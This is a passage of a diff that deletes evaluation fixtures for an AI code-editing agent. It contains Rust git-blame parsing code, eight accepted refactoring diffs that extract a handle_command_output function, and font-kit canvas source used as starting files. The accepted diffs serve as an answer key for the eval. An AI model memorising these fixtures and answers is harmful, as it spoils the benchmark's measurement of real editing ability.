unique_shas = HashSet::default(); - - for entry in entries.iter_mut() { - unique_shas.insert(entry.sha); - } - - let shas = unique_shas.into_iter().collect::>(); - let messages = get_messages(working_directory, &shas) - .await - .context("failed to get commit messages")?; - - Ok(Self { - entries, - messages, - remote_url, - }) - } -} - -const GIT_BLAME_NO_COMMIT_ERROR: &str = 
"fatal: no such ref: HEAD"; -const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; - -async fn run_git_blame( - git_binary: &Path, - working_directory: &Path, - path: &Path, - contents: &Rope, -) -> Result { - let mut child = util::command::new_smol_command(git_binary) - .current_dir(working_directory) - .arg("blame") - .arg("--incremental") - .arg("--contents") - .arg("-") - .arg(path.as_os_str()) - .stdin(Stdio::piped()) - .stdout(Stdio::piped()) - .stderr(Stdio::piped()) - .spawn() - .context("starting git blame process")?; - - let stdin = child - .stdin - .as_mut() - .context("failed to get pipe to stdin of git blame command")?; - - for chunk in contents.chunks() { - stdin.write_all(chunk.as_bytes()).await?; - } - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { - return Ok(String::new()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } - - Ok(String::from_utf8(output.stdout)?) -} - -#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] -pub struct BlameEntry { - pub sha: Oid, - - pub range: Range, - - pub original_line_number: u32, - - pub author: Option, - pub author_mail: Option, - pub author_time: Option, - pub author_tz: Option, - - pub committer_name: Option, - pub committer_email: Option, - pub committer_time: Option, - pub committer_tz: Option, - - pub summary: Option, - - pub previous: Option, - pub filename: String, -} - -impl BlameEntry { - // Returns a BlameEntry by parsing the first line of a `git blame --incremental` - // entry. 
The line MUST have this format: - // - // <40-byte-hex-sha1> - fn new_from_blame_line(line: &str) -> Result { - let mut parts = line.split_whitespace(); - - let sha = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing sha from {line}"))?; - - let original_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing original line number from {line}"))?; - let final_line_number = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing final line number from {line}"))?; - - let line_count = parts - .next() - .and_then(|line| line.parse::().ok()) - .with_context(|| format!("parsing line count from {line}"))?; - - let start_line = final_line_number.saturating_sub(1); - let end_line = start_line + line_count; - let range = start_line..end_line; - - Ok(Self { - sha, - range, - original_line_number, - ..Default::default() - }) - } - - pub fn author_offset_date_time(&self) -> Result { - if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { - let format = format_description!("[offset_hour][offset_minute]"); - let offset = UtcOffset::parse(author_tz, &format)?; - let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; - - Ok(date_time_utc.to_offset(offset)) - } else { - // Directly return current time in UTC if there's no committer time or timezone - Ok(time::OffsetDateTime::now_utc()) - } - } -} - -// parse_git_blame parses the output of `git blame --incremental`, which returns -// all the blame-entries for a given path incrementally, as it finds them. -// -// Each entry *always* starts with: -// -// <40-byte-hex-sha1> -// -// Each entry *always* ends with: -// -// filename -// -// Line numbers are 1-indexed. 
-// -// A `git blame --incremental` entry looks like this: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 -// author Joe Schmoe -// author-mail -// author-time 1709741400 -// author-tz +0100 -// committer Joe Schmoe -// committer-mail -// committer-time 1709741400 -// committer-tz +0100 -// summary Joe's cool commit -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// If the entry has the same SHA as an entry that was already printed then no -// signature information is printed: -// -// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 -// previous 486c2409237a2c627230589e567024a96751d475 index.js -// filename index.js -// -// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html -fn parse_git_blame(output: &str) -> Result> { - let mut entries: Vec = Vec::new(); - let mut index: HashMap = HashMap::default(); - - let mut current_entry: Option = None; - - for line in output.lines() { - let mut done = false; - - match &mut current_entry { - None => { - let mut new_entry = BlameEntry::new_from_blame_line(line)?; - - if let Some(existing_entry) = index - .get(&new_entry.sha) - .and_then(|slot| entries.get(*slot)) - { - new_entry.author.clone_from(&existing_entry.author); - new_entry - .author_mail - .clone_from(&existing_entry.author_mail); - new_entry.author_time = existing_entry.author_time; - new_entry.author_tz.clone_from(&existing_entry.author_tz); - new_entry - .committer_name - .clone_from(&existing_entry.committer_name); - new_entry - .committer_email - .clone_from(&existing_entry.committer_email); - new_entry.committer_time = existing_entry.committer_time; - new_entry - .committer_tz - .clone_from(&existing_entry.committer_tz); - new_entry.summary.clone_from(&existing_entry.summary); - } - - current_entry.replace(new_entry); - } - Some(entry) => { - let Some((key, value)) = line.split_once(' ') else { - continue; - }; - let is_committed = !entry.sha.is_zero(); - 
match key { - "filename" => { - entry.filename = value.into(); - done = true; - } - "previous" => entry.previous = Some(value.into()), - - "summary" if is_committed => entry.summary = Some(value.into()), - "author" if is_committed => entry.author = Some(value.into()), - "author-mail" if is_committed => entry.author_mail = Some(value.into()), - "author-time" if is_committed => { - entry.author_time = Some(value.parse::()?) - } - "author-tz" if is_committed => entry.author_tz = Some(value.into()), - - "committer" if is_committed => entry.committer_name = Some(value.into()), - "committer-mail" if is_committed => entry.committer_email = Some(value.into()), - "committer-time" if is_committed => { - entry.committer_time = Some(value.parse::()?) - } - "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), - _ => {} - } - } - }; - - if done { - if let Some(entry) = current_entry.take() { - index.insert(entry.sha, entries.len()); - - // We only want annotations that have a commit. - if !entry.sha.is_zero() { - entries.push(entry); - } - } - } - } - - Ok(entries) -} - -#[cfg(test)] -mod tests { - use std::path::PathBuf; - - use super::BlameEntry; - use super::parse_git_blame; - - fn read_test_data(filename: &str) -> String { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push(filename); - - std::fs::read_to_string(&path) - .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) - } - - fn assert_eq_golden(entries: &Vec, golden_filename: &str) { - let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); - path.push("test_data"); - path.push("golden"); - path.push(format!("{}.json", golden_filename)); - - let mut have_json = - serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); - // We always want to save with a trailing newline. 
- have_json.push('\n'); - - let update = std::env::var("UPDATE_GOLDEN") - .map(|val| val.eq_ignore_ascii_case("true")) - .unwrap_or(false); - - if update { - std::fs::create_dir_all(path.parent().unwrap()) - .expect("could not create golden test data directory"); - std::fs::write(&path, have_json).expect("could not write out golden data"); - } else { - let want_json = - std::fs::read_to_string(&path).unwrap_or_else(|_| { - panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); - }).replace("\r\n", "\n"); - - pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); - } - } - - #[test] - fn test_parse_git_blame_not_committed() { - let output = read_test_data("blame_incremental_not_committed"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_not_committed"); - } - - #[test] - fn test_parse_git_blame_simple() { - let output = read_test_data("blame_incremental_simple"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_simple"); - } - - #[test] - fn test_parse_git_blame_complex() { - let output = read_test_data("blame_incremental_complex"); - let entries = parse_git_blame(&output).unwrap(); - assert_eq_golden(&entries, "blame_incremental_complex"); - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff deleted file mode 100644 index c13a223c63f422..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff +++ /dev/null @@ -1,11 +0,0 @@ -@@ -94,6 +94,10 @@ - - let output = child.output().await.context("reading git blame output")?; - -+ handle_command_output(output) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { - if !output.status.success() { - let stderr = 
String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff deleted file mode 100644 index aa36a9241e9706..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff deleted file mode 100644 index d3c19b43803941..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff +++ /dev/null @@ -1,11 +0,0 @@ -@@ -93,7 +93,10 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(output) -+} - -+fn handle_command_output(output: std::process::Output) -> Result { - if !output.status.success() { - 
let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff deleted file mode 100644 index 1f87e4352c60ce..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff +++ /dev/null @@ -1,24 +0,0 @@ -@@ -93,17 +93,20 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(&output)?; -+ Ok(String::from_utf8(output.stdout)?) -+} - -+fn handle_command_output(output: &std::process::Output) -> Result<()> { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); - if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -+ return Ok(()); - } - anyhow::bail!("git blame process failed: {stderr}"); - } -- -- Ok(String::from_utf8(output.stdout)?) 
-+ Ok(()) - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff deleted file mode 100644 index 8f4b745b9a1105..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(&output); - } - - Ok(String::from_utf8(output.stdout)?) -+} -+ -+fn handle_command_output(output: &std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff deleted file mode 100644 index 3514d9c8e2969c..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff +++ /dev/null @@ -1,23 +0,0 @@ -@@ -93,7 +93,12 @@ - stdin.flush().await?; - - let output = child.output().await.context("reading git blame output")?; -+ handle_command_output(&output)?; - -+ Ok(String::from_utf8(output.stdout)?) 
-+} -+ -+fn handle_command_output(output: &std::process::Output) -> Result { - if !output.status.success() { - let stderr = String::from_utf8_lossy(&output.stderr); - let trimmed = stderr.trim(); -@@ -102,8 +107,7 @@ - } - anyhow::bail!("git blame process failed: {stderr}"); - } -- -- Ok(String::from_utf8(output.stdout)?) -+ Ok(String::from_utf8_lossy(&output.stdout).into_owned()) - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff deleted file mode 100644 index 9691479e2997ca..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) 
-+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}"); - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff b/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff deleted file mode 100644 index f5da859005aef0..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff +++ /dev/null @@ -1,26 +0,0 @@ -@@ -95,15 +95,19 @@ - let output = child.output().await.context("reading git blame output")?; - - if !output.status.success() { -- let stderr = String::from_utf8_lossy(&output.stderr); -- let trimmed = stderr.trim(); -- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -- return Ok(String::new()); -- } -- anyhow::bail!("git blame process failed: {stderr}"); -+ return handle_command_output(output); - } - - Ok(String::from_utf8(output.stdout)?) 
-+} -+ -+fn handle_command_output(output: std::process::Output) -> Result { -+ let stderr = String::from_utf8_lossy(&output.stderr); -+ let trimmed = stderr.trim(); -+ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { -+ return Ok(String::new()); -+ } -+ anyhow::bail!("git blame process failed: {stderr}") - } - - #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs b/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs deleted file mode 100644 index 12590fe6e93dc6..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs +++ /dev/null @@ -1,339 +0,0 @@ -// font-kit/src/canvas.rs -// -// Copyright © 2018 The Pathfinder Project Developers. -// -// Licensed under the Apache License, Version 2.0 or the MIT license -// , at your -// option. This file may not be copied, modified, or distributed -// except according to those terms. - -//! An in-memory bitmap surface for glyph rasterization. - -use lazy_static::lazy_static; -use pathfinder_geometry::rect::RectI; -use pathfinder_geometry::vector::Vector2I; -use std::cmp; -use std::fmt; - -use crate::utils; - -lazy_static! { - static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { - let mut lut = [[0; 8]; 256]; - for byte in 0..0x100 { - let mut value = [0; 8]; - for bit in 0..8 { - if (byte & (0x80 >> bit)) != 0 { - value[bit] = 0xff; - } - } - lut[byte] = value - } - lut - }; -} - -/// An in-memory bitmap surface for glyph rasterization. -pub struct Canvas { - /// The raw pixel data. - pub pixels: Vec, - /// The size of the buffer, in pixels. - pub size: Vector2I, - /// The number of *bytes* between successive rows. - pub stride: usize, - /// The image format of the canvas. - pub format: Format, -} - -impl Canvas { - /// Creates a new blank canvas with the given pixel size and format. 
- /// - /// Stride is automatically calculated from width. - /// - /// The canvas is initialized with transparent black (all values 0). - #[inline] - pub fn new(size: Vector2I, format: Format) -> Canvas { - Canvas::with_stride( - size, - size.x() as usize * format.bytes_per_pixel() as usize, - format, - ) - } - - /// Creates a new blank canvas with the given pixel size, stride (number of bytes between - /// successive rows), and format. - /// - /// The canvas is initialized with transparent black (all values 0). - pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { - Canvas { - pixels: vec![0; stride * size.y() as usize], - size, - stride, - format, - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { - self.blit_from( - Vector2I::default(), - &src.pixels, - src.size, - src.stride, - src.format, - ) - } - - /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. - /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. - /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. - /// `src_stride` must be equal or larger than the actual data length. - #[allow(dead_code)] - pub(crate) fn blit_from( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - src_format: Format, - ) { - assert_eq!( - src_stride * src_size.y() as usize, - src_bytes.len(), - "Number of pixels in src_bytes does not match stride and size." 
- ); - assert!( - src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, - "src_stride must be >= than src_size.x()" - ); - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - match (self.format, src_format) { - (Format::A8, Format::A8) - | (Format::Rgb24, Format::Rgb24) - | (Format::Rgba32, Format::Rgba32) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::A8, Format::Rgb24) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::A8) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::Rgba32) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::Rgb24) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_bitmap_1bpp( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - ) { - if self.format != Format::A8 { - unimplemented!() - } - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - let size = dst_rect.size(); - - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - let dest_row_stride = size.x() as usize * dest_bytes_per_pixel; - let src_row_stride = utils::div_round_up(size.x() as usize, 8); - - for y in 0..size.y() { - let (dest_row_start, src_row_start) = ( - (y + dst_rect.origin_y()) as usize * self.stride - + dst_rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - 
let dest_row_end = dest_row_start + dest_row_stride; - let src_row_end = src_row_start + src_row_stride; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - for x in 0..src_row_stride { - let pattern = &BITMAP_1BPP_TO_8BPP_LUT[src_row_pixels[x] as usize]; - let dest_start = x * 8; - let dest_end = cmp::min(dest_start + 8, dest_row_stride); - let src = &pattern[0..(dest_end - dest_start)]; - dest_row_pixels[dest_start..dest_end].clone_from_slice(src); - } - } - } - - /// Blits to area `rect` using the data given in the buffer `src_bytes`. - /// `src_stride` must be specified in bytes. - /// The dimensions of `rect` must be in pixels. - fn blit_from_with( - &mut self, - rect: RectI, - src_bytes: &[u8], - src_stride: usize, - src_format: Format, - ) { - let src_bytes_per_pixel = src_format.bytes_per_pixel() as usize; - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - - for y in 0..rect.height() { - let (dest_row_start, src_row_start) = ( - (y + rect.origin_y()) as usize * self.stride - + rect.origin_x() as usize * dest_bytes_per_pixel, - y as usize * src_stride, - ); - let dest_row_end = dest_row_start + rect.width() as usize * dest_bytes_per_pixel; - let src_row_end = src_row_start + rect.width() as usize * src_bytes_per_pixel; - let dest_row_pixels = &mut self.pixels[dest_row_start..dest_row_end]; - let src_row_pixels = &src_bytes[src_row_start..src_row_end]; - B::blit(dest_row_pixels, src_row_pixels) - } - } -} - -impl fmt::Debug for Canvas { - fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { - f.debug_struct("Canvas") - .field("pixels", &self.pixels.len()) // Do not dump a vector content. - .field("size", &self.size) - .field("stride", &self.stride) - .field("format", &self.format) - .finish() - } -} - -/// The image format for the canvas. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum Format { - /// Premultiplied R8G8B8A8, little-endian. 
- Rgba32, - /// R8G8B8, little-endian. - Rgb24, - /// A8. - A8, -} - -impl Format { - /// Returns the number of bits per pixel that this image format corresponds to. - #[inline] - pub fn bits_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 32, - Format::Rgb24 => 24, - Format::A8 => 8, - } - } - - /// Returns the number of color channels per pixel that this image format corresponds to. - #[inline] - pub fn components_per_pixel(self) -> u8 { - match self { - Format::Rgba32 => 4, - Format::Rgb24 => 3, - Format::A8 => 1, - } - } - - /// Returns the number of bits per color channel that this image format contains. - #[inline] - pub fn bits_per_component(self) -> u8 { - self.bits_per_pixel() / self.components_per_pixel() - } - - /// Returns the number of bytes per pixel that this image format corresponds to. - #[inline] - pub fn bytes_per_pixel(self) -> u8 { - self.bits_per_pixel() / 8 - } -} - -/// The antialiasing strategy that should be used when rasterizing glyphs. -#[derive(Clone, Copy, Debug, PartialEq)] -pub enum RasterizationOptions { - /// "Black-and-white" rendering. Each pixel is either entirely on or off. - Bilevel, - /// Grayscale antialiasing. Only one channel is used. - GrayscaleAa, - /// Subpixel RGB antialiasing, for LCD screens. - SubpixelAa, -} - -trait Blit { - fn blit(dest: &mut [u8], src: &[u8]); -} - -struct BlitMemcpy; - -impl Blit for BlitMemcpy { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - dest.clone_from_slice(src) - } -} - -struct BlitRgb24ToA8; - -impl Blit for BlitRgb24ToA8 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. 
- for (dest, src) in dest.iter_mut().zip(src.chunks(3)) { - *dest = src[1] - } - } -} - -struct BlitA8ToRgb24; - -impl Blit for BlitA8ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(3).zip(src.iter()) { - dest[0] = *src; - dest[1] = *src; - dest[2] = *src; - } - } -} - -struct BlitRgba32ToRgb24; - -impl Blit for BlitRgba32ToRgb24 { - #[inline] - fn blit(dest: &mut [u8], src: &[u8]) { - // TODO(pcwalton): SIMD. - for (dest, src) in dest.chunks_mut(3).zip(src.chunks(4)) { - dest.copy_from_slice(&src[0..3]) - } - } -} - -struct BlitRgb24ToRgba32; - -impl Blit for BlitRgb24ToRgba32 { - fn blit(dest: &mut [u8], src: &[u8]) { - for (dest, src) in dest.chunks_mut(4).zip(src.chunks(3)) { - dest[0] = src[0]; - dest[1] = src[1]; - dest[2] = src[2]; - dest[3] = 255; - } - } -} diff --git a/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs b/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs deleted file mode 100644 index 12590fe6e93dc6..00000000000000 --- a/crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs +++ /dev/null @@ -1,339 +0,0 @@ -// font-kit/src/canvas.rs -// -// Copyright © 2018 The Pathfinder Project Developers. -// -// Licensed under the Apache License, Version 2.0 or the MIT license -// , at your -// option. This file may not be copied, modified, or distributed -// except according to those terms. - -//! An in-memory bitmap surface for glyph rasterization. - -use lazy_static::lazy_static; -use pathfinder_geometry::rect::RectI; -use pathfinder_geometry::vector::Vector2I; -use std::cmp; -use std::fmt; - -use crate::utils; - -lazy_static! 
{ - static ref BITMAP_1BPP_TO_8BPP_LUT: [[u8; 8]; 256] = { - let mut lut = [[0; 8]; 256]; - for byte in 0..0x100 { - let mut value = [0; 8]; - for bit in 0..8 { - if (byte & (0x80 >> bit)) != 0 { - value[bit] = 0xff; - } - } - lut[byte] = value - } - lut - }; -} - -/// An in-memory bitmap surface for glyph rasterization. -pub struct Canvas { - /// The raw pixel data. - pub pixels: Vec, - /// The size of the buffer, in pixels. - pub size: Vector2I, - /// The number of *bytes* between successive rows. - pub stride: usize, - /// The image format of the canvas. - pub format: Format, -} - -impl Canvas { - /// Creates a new blank canvas with the given pixel size and format. - /// - /// Stride is automatically calculated from width. - /// - /// The canvas is initialized with transparent black (all values 0). - #[inline] - pub fn new(size: Vector2I, format: Format) -> Canvas { - Canvas::with_stride( - size, - size.x() as usize * format.bytes_per_pixel() as usize, - format, - ) - } - - /// Creates a new blank canvas with the given pixel size, stride (number of bytes between - /// successive rows), and format. - /// - /// The canvas is initialized with transparent black (all values 0). - pub fn with_stride(size: Vector2I, stride: usize, format: Format) -> Canvas { - Canvas { - pixels: vec![0; stride * size.y() as usize], - size, - stride, - format, - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_canvas(&mut self, src: &Canvas) { - self.blit_from( - Vector2I::default(), - &src.pixels, - src.size, - src.stride, - src.format, - ) - } - - /// Blits to a rectangle with origin at `dst_point` and size according to `src_size`. - /// If the target area overlaps the boundaries of the canvas, only the drawable region is blitted. - /// `dst_point` and `src_size` are specified in pixels. `src_stride` is specified in bytes. - /// `src_stride` must be equal or larger than the actual data length. 
- #[allow(dead_code)] - pub(crate) fn blit_from( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - src_format: Format, - ) { - assert_eq!( - src_stride * src_size.y() as usize, - src_bytes.len(), - "Number of pixels in src_bytes does not match stride and size." - ); - assert!( - src_stride >= src_size.x() as usize * src_format.bytes_per_pixel() as usize, - "src_stride must be >= than src_size.x()" - ); - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - match (self.format, src_format) { - (Format::A8, Format::A8) - | (Format::Rgb24, Format::Rgb24) - | (Format::Rgba32, Format::Rgba32) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::A8, Format::Rgb24) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::A8) => { - self.blit_from_with::(dst_rect, src_bytes, src_stride, src_format) - } - (Format::Rgb24, Format::Rgba32) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::Rgb24) => self - .blit_from_with::(dst_rect, src_bytes, src_stride, src_format), - (Format::Rgba32, Format::A8) | (Format::A8, Format::Rgba32) => unimplemented!(), - } - } - - #[allow(dead_code)] - pub(crate) fn blit_from_bitmap_1bpp( - &mut self, - dst_point: Vector2I, - src_bytes: &[u8], - src_size: Vector2I, - src_stride: usize, - ) { - if self.format != Format::A8 { - unimplemented!() - } - - let dst_rect = RectI::new(dst_point, src_size); - let dst_rect = dst_rect.intersection(RectI::new(Vector2I::default(), self.size)); - let dst_rect = match dst_rect { - Some(dst_rect) => dst_rect, - None => return, - }; - - let size = dst_rect.size(); - - let dest_bytes_per_pixel = self.format.bytes_per_pixel() as usize; - let dest_row_stride = 
